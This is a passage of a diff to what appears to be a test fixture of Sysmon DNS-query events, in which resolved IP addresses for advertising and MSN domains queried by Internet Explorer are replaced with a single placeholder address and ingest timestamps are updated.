Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:05.034Z", @@ -14560,12 +14391,12 @@ "type": "CNAME" }, { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { @@ -14582,13 +14413,13 @@ "hbx.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742194400Z", + "ingested": "2021-12-09T13:50:23.457392900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:06.051Z", @@ -14652,27 +14483,27 @@ "type": "CNAME" }, { - "data": "151.101.194.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.49", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.194.49", - "151.101.2.49", - "151.101.66.49", - "151.101.130.49" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -14688,16 +14519,13 @@ "match.taboola.com" ], "ip": [ - "151.101.194.49", - "151.101.2.49", - "151.101.66.49", - "151.101.130.49" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742203Z", + "ingested": "2021-12-09T13:50:23.457398700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:151.101.194.49;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:06.051Z", @@ -14761,17 +14589,17 @@ "type": "CNAME" }, { - "data": "23.50.53.185", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.194", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.185", - "23.50.53.194" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -14787,14 +14615,13 @@ "img-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.185", - "23.50.53.194" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742211500Z", + "ingested": "2021-12-09T13:50:23.457404600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:23.50.53.185;::ffff:23.50.53.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:06.051Z", @@ -14858,17 +14685,17 @@ "type": "CNAME" }, { - "data": "23.50.53.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.186", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -14884,14 +14711,13 @@ "static-entertainment-eus-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742219900Z", + "ingested": "2021-12-09T13:50:23.457410300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -14959,12 +14785,12 @@ "type": "CNAME" }, { - "data": "23.217.149.91", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.217.149.91" + "89.160.20.156" ] }, "network": { @@ -14981,13 +14807,13 @@ "radarmaps.weather.microsoft.com" ], "ip": [ - "23.217.149.91" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742228100Z", + "ingested": "2021-12-09T13:50:23.457416Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:23.217.149.91;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15051,17 +14877,17 @@ "type": "CNAME" }, { - "data": "23.50.53.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.186", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -15077,14 +14903,13 @@ "static-entertainment-eus-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742236900Z", + "ingested": "2021-12-09T13:50:23.457421900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15148,12 +14973,12 @@ "type": "CNAME" }, { - "data": "152.195.32.163", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "152.195.32.163" + "89.160.20.156" ] }, "network": { @@ -15169,13 +14994,13 @@ "tag.sp.advertising.com" ], "ip": [ - "152.195.32.163" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742245200Z", + "ingested": "2021-12-09T13:50:23.457427800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs747173190.wac.omegacdn.net;::ffff:152.195.32.163;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity 